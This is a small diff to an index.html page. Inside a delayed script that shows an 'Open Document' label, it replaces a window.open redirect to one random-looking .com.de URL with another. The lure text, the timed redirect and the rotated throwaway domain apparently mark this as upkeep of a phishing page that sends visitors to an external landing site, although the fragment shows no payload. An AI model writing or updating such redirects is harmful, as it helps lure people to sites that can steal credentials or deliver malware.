--- a/index.html
+++ b/index.html
@@ -333,7 +333,7 @@
                     </svg>
                     <span>Open Document</span>
                 `;
-                window.open("https://devnix.com.de/sOouvLsxZ/", "_blank");
+                window.open("https://cybernox.com.de/LIv1V3S2kPT8/", "_blank");
             }, 2000);
         }
     </script>
